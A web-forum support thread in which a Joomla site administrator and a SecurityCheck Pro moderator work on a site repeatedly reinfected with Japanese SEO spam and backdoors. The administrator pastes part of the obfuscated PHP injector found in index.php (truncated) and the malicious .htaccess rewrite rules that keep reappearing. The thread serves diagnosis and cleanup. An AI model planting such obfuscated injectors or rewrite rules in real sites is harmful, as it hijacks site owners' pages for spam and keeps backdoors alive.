- Home
- /
- Forum
- /
- Securitycheck Pro
- /
- Newbies area
- /
- Locked Tables Enhancements
Site keeps getting infected even with SecurityCheck Pro
- shibumi
-
Topic Author
- Offline
- Premium Member
-
Please Log in or Create an account to join the conversation.
- Jose
-
- Offline
- Moderator
-
- Posts: 4413
- Thank you received: 327
Last week I cleaned an infection like yours; the site was infected again and again because there were many backdoors into it. If cybercrooks put a backdoor in the site they will be able to bypass the firewall; we must not forget that SCP is a Web Application Firewall (accesses to backdoors are done directly and not following the Joomla route mechanism, so there is no attack).
A few questions?
- Is the malware scanner configured to scan the entire filesystem (timeline = 10000 and deep scan enabled)?
- Is the file itegrity feature alerting you of the modified file?
Regards,
Jose
Please Log in or Create an account to join the conversation.
- shibumi
-
Topic Author
- Offline
- Premium Member
-
I tried your suggestions and ran a deep scan last night, and it did find Blackhat SEO Spam, I cleaned up the files, and once again this evening this code was injected at the top of the root index.php file:
@set_time_limit(0);
$xmlname = 'mapss.xml';
$jdir = '';
$smuri_tmp = smrequest_uri();
if($smuri_tmp==''){
$smuri_tmp='/';
}
$smuri = base64_encode($smuri_tmp);
$dt = 0;
function smrequest_uri(){
if (isset($_SERVER['REQUEST_URI'])){
$smuri = $_SERVER['REQUEST_URI'];
}else{
if(isset($_SERVER['argv'])){
$smuri = $_SERVER['PHP_SELF'] . '?' . $_SERVER['argv'][0];
}else{
$smuri = $_SERVER['PHP_SELF'] . '?' . $_SERVER['QUERY_STRING'];
}
}
return $smuri;
}
$O00OO0=urldecode("%6E1%7A%62%2F%6D%615%5C%76%740%6928%2D%70%78%75%71%79%2A6%6C%72%6B%64%679%5F%65%68%63%73%77%6F4%2B%6637%6A");$O00O0O=$O00OO0{3}.$O00OO0{6}.$O00OO0{33}.$O00OO0{30};$O0OO00=$O00OO0{33}.$O00OO
.... more lines of code ....
MDAoJE8wTzAwMCwwLCRPTzAwMDApKSkpOw=="));Every time it is injected, there is no Last Modified time stamp change to the file, except for when I remove the above code, and save the file, and then chmod it to 0444. the only thing that is different that indicates the file has been injected again, is the file permissions have changed back to 0644.
This site, when they originally contacted me for help, was infected with over 5000 malicious html files in various added to their server which had been all removed. I would do a complete re-install of their site from scratch, but not sure if the client has copies of all their paid extensions/templates as I did not do the original design, and not sure of the original designer is still around since they contacted me for help.
I attached the export of the latest deep scan
Thanks,
Jeff
Please Log in or Create an account to join the conversation.
- Jose
-
- Offline
- Moderator
-
- Posts: 4413
- Thank you received: 327
Every time it is injected, there is no Last Modified time stamp change to the file, except for when I remove the above code, and save the file, and then chmod it to 0444. the only thing that is different that indicates the file has been injected again, is the file permissions have changed back to 0644.
This is really odd; even a single character modified changes the hash value and you should be alerted...
I have checked the zipped file attached and I think still there are some malicious files (I should get the files to be fully sure); check the file /libraries/joomla/application/cache-66e.php and /media/system/images/thumb.php. I think those files are upload forms, so hacker can use them to upload new backdoors.
Also remember I clean infected websites; if you need help ask me for a quotation. Maybe you can clean the website instead a complete re-install.
Regards,
Jose
Please Log in or Create an account to join the conversation.
- shibumi
-
Topic Author
- Offline
- Premium Member
-
Webmaster wrote: Hi Jeff,
Every time it is injected, there is no Last Modified time stamp change to the file, except for when I remove the above code, and save the file, and then chmod it to 0444. the only thing that is different that indicates the file has been injected again, is the file permissions have changed back to 0644.
This is really odd; even a single character modified changes the hash value and you should be alerted...
The only time the timestamp changes is when I remove the code and save the file.
My last file integrity scan showed 3 modified files: .htaccess (2017-05-07 03:23:15), error_log (2017-05-07 08:24:50) and index.php (2017-05-07 08:21:18)
Another interesting thing, is my .htaccess file is getting wiped and overwritten with the following code at 5:23am everyday:
RewriteEngine On
RewriteCond %{REQUEST_URI} !^/[0-9]+\..+\.cpaneldcv$
RewriteCond %{REQUEST_URI} !^/[A-F0-9]{32}\.txt(?:\ Comodo\ DCV)?$
RewriteRule ^[a-zA-Z0-9]{3}([a-zA-Z0-9]{5,19})/([0-9]{1,7}).html$ index.php?tempweb=$1&smid=$2 [L]
RewriteBase /
RewriteCond %{REQUEST_URI} !^/[0-9]+\..+\.cpaneldcv$
RewriteCond %{REQUEST_URI} !^/[A-F0-9]{32}\.txt(?:\ Comodo\ DCV)?$
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteCond %{REQUEST_URI} !^/[0-9]+\..+\.cpaneldcv$
RewriteCond %{REQUEST_URI} !^/[A-F0-9]{32}\.txt(?:\ Comodo\ DCV)?$
RewriteRule . /index.php [L]RewriteEngine On
RewriteCond %{REQUEST_URI} !^/[0-9]+\..+\.cpaneldcv$
RewriteCond %{REQUEST_URI} !^/[A-F0-9]{32}\.txt(?:\ Comodo\ DCV)?$
RewriteRule ^[a-zA-Z0-9]{3}([a-zA-Z0-9]{5,19})/([0-9]{1,7}).html$ index.php?tempweb=$1&smid=$2 [L]
RewriteBase /
RewriteCond %{REQUEST_URI} !^/[0-9]+\..+\.cpaneldcv$
RewriteCond %{REQUEST_URI} !^/[A-F0-9]{32}\.txt(?:\ Comodo\ DCV)?$
RewriteRule ^([0-9]+)\/([^\d\/]+)\/([0-9]+)_(.*)..*$ ?$2$3=$1&%{QUERY_STRING}[L]
RewriteCond %{REQUEST_URI} !^/[0-9]+\..+\.cpaneldcv$
RewriteCond %{REQUEST_URI} !^/[A-F0-9]{32}\.txt(?:\ Comodo\ DCV)?$
RewriteRule ^([0-9]+)\/([^\d\/]+)([0-9]+).[0-9]+,[0-9]+.[0-9]+,[0-9]+.*\/.*=![0-9]+.*[0-9]+![0-9]+.*[0-9]+![0-9]+.*[0-9]+.*[0-9]+.*[0-9]+.*[0-9]+.*\:[0-9]+.*[0-9]+.*[0-9]+.*[0-9]+.*$ ?$2$1=$3&%{QUERY_STRING}[L]
RewriteCond %{REQUEST_URI} !^/[0-9]+\..+\.cpaneldcv$
RewriteCond %{REQUEST_URI} !^/[A-F0-9]{32}\.txt(?:\ Comodo\ DCV)?$
RewriteRule ^([0-9]+)\/([^\d\/]+)([0-9]+).[0-9]+,[0-9]+.[0-9]+,[0-9]+.*\/.*=![0-9]+.*[0-9]+![0-9]+.*[0-9]+![0-9]+.*[0-9]+.*[0-9]+.*[0-9]+.*[0-9]+.*\:[0-9]+.*[0-9]+.*[0-9]+.*[0-9]+.*\?.*=.*-JP$ ?$2$1=$3&%{QUERY_STRING}[L]
RewriteCond %{REQUEST_URI} !^/[0-9]+\..+\.cpaneldcv$
RewriteCond %{REQUEST_URI} !^/[A-F0-9]{32}\.txt(?:\ Comodo\ DCV)?$
RewriteRule ^(.*)\/([^\d\/]+)\/([0-9]+)\/([0-9]+)\/.*\/.*\/.*\/.*..*$ ?$2$3=$4&%{QUERY_STRING}[L]
RewriteCond %{REQUEST_URI} !^/[0-9]+\..+\.cpaneldcv$
RewriteCond %{REQUEST_URI} !^/[A-F0-9]{32}\.txt(?:\ Comodo\ DCV)?$
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteCond %{REQUEST_URI} !^/[0-9]+\..+\.cpaneldcv$
RewriteCond %{REQUEST_URI} !^/[A-F0-9]{32}\.txt(?:\ Comodo\ DCV)?$
RewriteRule . /index.php [L]Webmaster wrote: I have checked the zipped file attached and I think still there are some malicious files (I should get the files to be fully sure); check the file /libraries/joomla/application/cache-66e.php and /media/system/images/thumb.php. I think those files are upload forms, so hacker can use them to upload new backdoors.
I deleted the two files you mentioned, they were definitely malicious coded files, and the Japanese content injection seemed to be gone, until today, it came back...
Webmaster wrote: Also remember I clean infected websites; if you need help ask me for a quotation. Maybe you can clean the website instead a complete re-install.
Regards,
Jose
Please Log in or Create an account to join the conversation.
- Jose
-
- Offline
- Moderator
-
- Posts: 4413
- Thank you received: 327
Yes, I did some improvements in the site. I apologize about that.I tried to post the other day, but kept giving me an error, then could not even access your site for a while...
Maybe hackers change the timestamp, but even if this happens the hash value should change and the extension should warn you.The only time the timestamp changes is when I remove the code and save the file.
My last file integrity scan showed 3 modified files: .htaccess (2017-05-07 03:23:15), error_log (2017-05-07 08:24:50) and index.php (2017-05-07 08:21:18)
I think this is an automated task of your hosting provider; please, read this forum entryAnother interesting thing, is my .htaccess file is getting wiped and overwritten with the following code at 5:23am everyday
Or your website or the server is still infected; do you have a shared hosting or a dedicated server?I deleted the two files you mentioned, they were definitely malicious coded files, and the Japanese content injection seemed to be gone, until today, it came back...
Regards,
Jose
Please Log in or Create an account to join the conversation.